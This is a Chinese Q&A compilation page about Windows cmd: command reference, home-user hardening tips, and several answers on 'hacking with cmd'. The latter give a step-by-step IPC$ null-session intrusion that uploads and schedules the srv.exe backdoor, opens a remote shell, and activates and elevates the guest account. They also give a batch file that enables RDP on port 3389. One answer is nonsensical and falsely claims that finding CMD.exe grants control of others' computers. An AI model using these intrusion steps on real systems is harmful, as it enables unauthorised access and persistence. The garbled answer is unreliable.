cmd防黑客代码(cmd攻击代码)
本文目录一览:
cmd是什么
cmd是command的缩写.命令行
在9x系统下输入command就可以打开命令行.而在NT系统上可以输入cmd来打开.
操作顺序是:开始->运行->键入cmd或command
在命令行里你可以看到你的系统版本,文件系统版本等等
你可以敲入help查看帮助
Cmd启动命令解释器Cmd.exe的新实例。如果在不含参数的情况下使用,则cmd显示WindowsXP的版本和版权信息。
语法
cmd[[{/c|/k}][/s][/q][/d][{/a|/u}][/t:fg][/e:{on|off}][/f:{on|off}][/v:{on|off}]string]
参数
/c
执行string指定的命令,然后停止。
/k
执行string指定的命令并继续。
/s
修改位于/c或/k之后的string处理。
/q
关闭回显。
/d
禁用自动运行命令执行。
/a
创建美国国家标准协会(ANSI)输出。
/u
创建Unicode输出。
/t:fg
设置前景f和背景g的颜色。下表列出了可用作f和g的值的有效十六进制数字。值颜色
0黑色
1蓝色
2绿
3湖蓝色
4红
5紫色
6黄
7白色
8灰色
9浅蓝色
A浅绿色
B浅水绿
C浅红色
D浅紫色
E浅黄色
F亮白色
/e:on
启用命令扩展。
/e:off
禁用命令扩展。
/f:on
启用文件和目录名完成。
/f:off
禁用文件和目录名完成。
/v:on
启用延迟的环境变量扩展。
/v:off
禁用延迟的环境变量扩展。
string
指定要执行的命令。
/?
在命令提示符显示帮助。
注释
使用多个命令
可以在string中使用由分隔的多个命令,不过这些命令必须置于引号之中(例如,"commandcommandcommand")。
处理引号
如果指定了/c或/k,则在满足下述所有条件的情况下,cmd会处理string中的其余命令而将引号保留:
未使用/s。
正确使用一对引号。
在引号内未使用任何特殊字符(例如:()@^|}。
在引号内使用了一个或多个空格子符。
引号内的string为可执行文件的名称。
如果上述条件不能满足,则处理string时将首先检查它的第一个字符以验证其是否为左引号。如果第一个字符是左引号,则它会与右引号分离开。跟在右引号之后的任何文本都会得到保留。
执行注册表子项
如果在string中未指定/d,Cmd.exe会查找下述注册表子项:
HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\AutoRun\REG_SZ
HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\AutoRunREG_EXPAND_SZ
如果上述的一个注册表子项或两个都存在,则会在执行其他变量之前执行它们。
警告
编辑注册表不当可能会严重损坏您的系统。在更改注册表之前,应备份计算机上任何有价值的数据。
启用和禁用命令扩展
在WindowsXP中,命令扩展在默认情况下是启用的。对于特定过程可以使用/e:off将它们禁用。通过设置下述REG_DWORD值,可以在计算机上或用户会话中启用或禁用所有cmd命令行选项的扩展:
HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\EnableExtensions\REG_DWORD
HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\EnableExtensions\REG_DWORD
在注册表中使用Regedit.exe可以将REG_DWORD值设为0×1(即启用)或0×0(即禁用)。用户特定设置优先于计算机设置,并且命令行选项优先于注册表设置。
警告
编辑注册表不当可能会严重损坏您的系统。在更改注册表之前,应备份计算机上任何有价值的数据。
启用命令扩展后,会影响到下述命令:
assoc
call
chdir(cd)
color
del(erase)
endlocal
for
ftype
goto
if
mkdir(md)
popd
prompt
pushd
set
setlocal
shift
start(还包括将更改外部命令过程)
有关这些命令的详细信息,请参阅“相关主题”。
启用延迟的环境变量扩展
启用延迟的环境变量扩展,可以使用感叹号字符来替代运行时的环境变量值。
启用文件和目录名完成
默认情况下,禁用文件和目录名完成。对于特定的cmd命令处理,可以通过/f:{on|off}来启用或禁用该功能。通过设置下述REG_DWORD值,可以在计算机上或用户会话中启用或禁用所有cmd命令处理的文件和目录名完成:
HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\CompletionChar\REG_DWORD
HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\PathCompletionChar\REG_DWORD
HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\CompletionChar\REG_DWORD
HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\PathCompletionChar\REG_DWORD
要设置REG_DWORD值,请运行Regedit.exe并使用特定功能的控制字符的十六进制值(例如,用0×9表示TAB键,用0×08表示BACKSPACE键)。用户特定设置优先于计算机设置,并且命令行选项优先于注册表设置。
警告
编辑注册表不当可能会严重损坏您的系统。在更改注册表之前,应备份计算机上任何有价值的数据。
如果使用/f:on启用了文件和目录名完成,则对于目录名完成,可使用CTRL+D组合键;而对于文件名完成,可使用CTRL+F组合键。要禁用注册表中特定字符的完成,请使用空格值[0×20],因为空格不是有效的控制字符。
按CTRL+D或CTRL+F组合键时,cmd会处理文件和目录名的完成操作。这些组合键的作用是在string后附加通配符(如果还未使用),并创建匹配的路径列表,然后显示第一个匹配的路径。如果所有路径都不匹配,文件和目录名完成操作会发出警告声,并且不更改所显示的内容。要逐个查看匹配路径列表中的路径,请重复按CTRL+D或CTRL+F组合键。要向后查看该列表,请在按SHIFT的同时按CTRL+D或CTRL+F组合键。要放弃已保存的匹配路径列表并生成新列表,可以编辑string,然后按CTRL+D或CTRL+F组合键。如果在CTRL+D和CTRL+F组合键之间切换,将会放弃已保存的匹配路径列表并生成新列表。CTRL+D组合键与CTRL+F组合键之间唯一的不同在于,CTRL+D仅匹配目录名,而CTRL+F既匹配文件名,又匹配目录名。如果在任何内部目录命令(CD、MD或RD)中使用文件和目录名的完成,将仅使用目录的完成。
如果将匹配路径置于引号之中,则文件和目录名完成会正确地处理含有空格或特殊字符的文件名。
下述特殊字符需要有引号:[]{}^=;!'+,`~[whitespace]
如果您提供的信息包含空格,请将文本置于引号之中(例如,"ComputerName")。
如果从string中处理文件和目录名完成操作,则位于光标右侧的[Path]的任意部分都将放弃(即在string中处理完成操作的位置)。
格式化图例
格式含义
斜体用户必须提供的信息
粗体用户必须像显示的一样准确键入的元素
省略号(...)可在命令行中重复多次的参数
在括号([])之间可选项目
在大括号({})之间;将选项用竖线(|)隔开。例如:{even|odd}用户必须从中只选择一个选项的选项组
Courier字体代码或程序输出
黑客代码在哪输入
开始————运行——CMD 黑客dos命令: net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限 等等还有很多。。。。。。
如何防范黑客
一些防范黑客的基本措施
谈到黑客 大家往往都表现的很害怕 其实不然 我们都知道真正的黑客是不屑于攻击那些明显的菜鸟的肉鸡的 而我们平时所受到的攻击 往往都是来自于那些所谓黑客的菜鸟
所以呢 既然是菜鸟 我门当然可以通过一些简单的方法来防范一般的攻击保护我们电脑的安全。
1.首先我们要作到的 也就是我认为最重要的就是要把administrator的密码一定要设置的复杂一点,因为众所周知,入侵的第一步就是扫描 你想想如果一个一般的菜鸟扫到了你的机子有administrator的弱口令或者空口令 呵呵 我想不要什么技术就可以完全控制了对吧
首先用opentelnet 给你开个telnet 服务端口 登陆上去 传个木马你就完了 一举一动都被别个控制了;
防范: 设置administrator 密码 控制面版---------用户帐户-------administrator
2.删除不必要的用户 如果你不幸中了木马 一般人为了方便都会新建立一个帐户 留个后门,所以我们很有必要知道自己的机子有哪些用户在用
方法: 进入cmd 输入 net user 就会列出所有的用户 如果发现可疑的就可以删除
使用命令 net user 用户名 /delete
同第一点一样 自己所用的用户密码不要设置的简单 这是老话题 但每次扫描还是会扫出来很多这样的机子~~~~~~~~~~~~~~~~~~~~
3.关掉自己的共享(如果不是有什么特别的需要强烈推荐) 大家可以在cmd 下面 输入命令 net share 是不是很吃惊 因为操作系统安装默认的这些共享是开着的
防范: 使用命令(如果想删除C$) net share c$ /delete
依次类推
著名的IP$ 空连接攻击就是利用了这个 虽然现在不流行了 但是还是希望大家注意;
附加一点 如果没有特殊用途 希望大家关掉 netbios 选项 这也是菜鸟黑客可以利用的一个漏洞。
方法:控制面板---------网络连接-------本地连接------------属性-----------------tcp/ip 协议-------高级-------wins--------禁用tcp/ip上面的netbios
关于如何关闭ip$ 控制面板--------管理工具---------服务----------server 停止就可以了(如果你的机子对外提供如IIS服务 则不能使用此方法)
4.关于系统漏洞:
这方面没有话说 正如我的题目说的 我门的专业计算机水平不是很高 对一些操作系统底层的东西知道的可谓很少很少 这方面的漏洞 只有靠我们自己平时多下载微软的补丁才可以了 没有别的办法
保护好SAM文件,最好设置成隐藏
如果有怀疑 可以在cmd 下面 查看自己的端口的使用情况 用命令netstat –an
在怎么厉害的入侵不可能不与你建立连接把 那我就服了他了
然后关闭相应的端口
5.关于QQ方面的
现在很多人QQ被盗取了 最最最重要的就是不要轻易点别人发来的东西 切记
QQ方面的工具软件是菜鸟最容易上手的工具 下个软件 点生成木马 然后下个捆绑软件把木马伪装就可以了,这方面最最最重要的防范就是不要轻易点开别个发你的东西
有人说我看了的 他发的确实是.后缀jpg的图片文件啊 我昏 操作系统默认的是隐藏已知的后缀名 选择 文件夹选项-----------查看---------不隐藏已知文件类型的扩展名
再看看发来的东西 是不是什么 ******.src.exe 这不是明显的病毒吗?? 还有这个方面的防范就是一定要申请QQ 密码保护 而且要记住自己的资料 方便后来找回来
6.关于电子邮箱:
关于电子邮箱的盗取 有的菜鸟会冒充 一些服务中心的管理员给你发一封电子邮件 声称什么系统升级什么的 叫你填密码 我想这么幼稚的方法现在没有人会中招了吧??因为现在的人都不会轻易打开邮箱的可执行文件 所以现在都靠 系统邮件和 图片来欺骗大家 所以希望大家小心 还有就是建议大家不要使用第三方软件收发邮件 图方便吗??是方便重要还是安全重要?? 因为这些软件也回有很严重的漏洞 还有就是不要认为邮箱是免费的就不用好好设置密码了 那样黑客软件穷举 很快就可以破解的
7.关于入侵了该怎么办
首先应该查看进程管理器 看下有没有什么可疑的进程 什么??你不知道那些进程是干什么的 我告诉你你要查哪个进程 复制粘贴 百度 ******进程 上面跟你写的清清楚楚 我觉得你现在没有先停一下 打开自己的进程看看 现在就去查 我真的觉得很有必要~~~~~~~~~~ 发现之后 找到位置 删除 注册表 删除(记得备分哈) 然后进入安全模式再杀 这样杀的干净些 木马是木马 病毒是病毒 装了杀软 还是要装个木马克星什么之类的 因为有的杀软是杀不了的
cmd攻击别人电脑命令,
无法攻击别人电脑,但是可以访问别人电脑。
如下参考:
1.在桌面上,单击“开始”,单击“运行”。
2.输入输入CMDCMD并单击ok。
3.或单击“开始”,并输入CMD。
4.单击搜索CMD,然后您可以输入属。
5.单击“计算机”,单击“磁盘C。
6.搜索CMD.Exe,点击搜索软件,然后就可以进入别人的电脑内部,可以控制电脑了。
跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有
一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的网络命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
怎样利用“CMD”进行黑客入侵?
1、首先我们新建一个文本文档,然后放进一下代码:
echo Windows Registry Editor Version 5.003389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]3389.reg
echo "fDenyTSConnections"=dword:000000003389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]3389.reg
echo "PortNumber"=dword:00000d3d3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]3389.reg
echo "PortNumber"=dword:00000d3d3389.reg
regedit /s 3389.reg
del 3389.reg
2、点击左上角的文件-另存为-然后如下图操作,命名为xxx.bat,注意后缀一定要是bat,还有要选择所有文件
3、生成如下图的cmd文件,我们打开就可以打开3389端口了,这是黑客入侵的常用手法,通常我们是不会这样做的。
3389是一个非常危险的端口,我们右键点击我的电脑-属性-远程,看到一下两个小方框被打上勾了,如果不是自己操作,一定要把两个勾去掉,下面的那个小方框里面如果打上勾就是证明开启了3389远程端口。
